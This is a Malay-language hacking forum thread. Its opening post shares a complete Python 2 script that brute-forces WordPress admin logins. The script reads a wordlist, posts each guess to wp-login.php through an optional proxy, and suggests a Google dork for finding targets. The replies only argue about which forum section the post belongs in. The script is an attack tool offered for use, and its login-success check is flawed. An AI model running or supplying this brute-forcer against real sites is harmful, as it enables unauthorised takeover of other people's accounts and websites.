Thread Rating:
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
wpbruteforce.py
#1
nih hasil daripada saya google2 tadi...belum try lagi..
Code:
#!/usr/bin/python
#WordPress Brute Force (wp-login.php)

#If cookies enabled brute force will not work (yet)
#Change response on line 97 if needed. (language)

#Dork: inurl:wp-login.php

#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com

import urllib2, sys, re, urllib, httplib, socket

print "\n   d3hydr8[at]gmail[dot]com WordPressBF v1.0"
print "----------------------------------------------"

if len(sys.argv) not in [4,5,6,7]:
    print "Usage: ./wordpressbf.py <site> <user> <wordlist> <options>\n"
    print "\t   -p/-proxy <host:port> : Add proxy support"
    print "\t   -v/-verbose : Verbose Mode\n"
    sys.exit(1)
    
for arg in sys.argv[1:]:
    if arg.lower() == "-p" or arg.lower() == "-proxy":
        proxy = sys.argv[int(sys.argv[1:].index(arg))+2]
    if arg.lower() == "-v" or arg.lower() == "-verbose":
        verbose = 1
        
try:
    if proxy:
        print "\n[+] Testing Proxy..."
        h2 = httplib.HTTPConnection(proxy)
        h2.connect()
        print "[+] Proxy:",proxy
except(socket.timeout):
    print "\n[-] Proxy Timed Out"
    proxy = 0
    pass
except(NameError):
    print "\n[-] Proxy Not Given"
    proxy = 0
    pass
except:
    print "\n[-] Proxy Failed"
    proxy = 0
    pass
    
try:
    if verbose == 1:
        print "[+] Verbose Mode On\n"
except(NameError):
    print "[-] Verbose Mode Off\n"
    verbose = 0
    pass
    
if sys.argv[1][:7] != "http://":
    host = "http://"+sys.argv[1]
else:
    host = sys.argv[1]
    
print "[+] BruteForcing:",host
print "[+] User:",sys.argv[2]

try:
      words = open(sys.argv[3], "r").readlines()
      print "[+] Words Loaded:",len(words),"\n"
except(IOError):
      print "[-] Error: Check your wordlist path\n"
      sys.exit(1)
  
for word in words:
    word = word.replace("\r","").replace("\n","")
    login_form_seq = [
         ('log', sys.argv[2]),
         ('pwd', word),
         ('rememberme', 'forever'),
         ('wp-submit', 'Login >>'),
        ('redirect_to', 'wp-admin/')]
    login_form_data = urllib.urlencode(login_form_seq)
    if proxy != 0:
        proxy_handler = urllib2.ProxyHandler({'http': 'http://'+proxy+'/'})
        opener = urllib2.build_opener(host, proxy_handler)
    else:
        opener = urllib2.build_opener(host)
    try:
        site = opener.open(host, login_form_data).read()
    except(urllib2.URLError), msg:
        print msg
        site = ""
        pass

    if re.search("WordPress requires Cookies",site):
        print "[-] Failed: WordPress has cookies enabled\n"
        sys.exit(1)
        
    #Change this response if different. (language)
    if re.search("<strong>ERROR</strong>",site) and verbose == 1:
        print "[-] Login Failed:",word
    else:
        print "\n\t[!] Login Successfull:",sys.argv[2],word,"\n"
print "\n[-] Brute Complete\n"
[Image: 82894083.gif]
Reply
#2
py lagi :FP:
Jangan disebabkan ‪#‎Cingey‬ ia menjadi batu yang menghalang untuk kita terus ke depan...
[Image: 76561198103081830.png][Image: AddFriend.png]
Reply
#3
(18-04-2012, 04:52 PM)AceyrafRoshlanz Wrote:  py lagi :FP:
kenapa bang? GayFace


[Image: 82894083.gif]
Reply
#4
patut ke section python GayFace
  ▲[Image: 4WmjMvl.gif]
[Image: 6Jv0hAf.gif]\(^◡^ )



Reply
#5
(18-04-2012, 08:49 PM)Codeshift3r Wrote:  patut ke section python GayFace

ni bukan tempat share papers/script ke?
[Image: 82894083.gif]
Reply


Forum Jump:


Users browsing this thread: 1 Guest(s)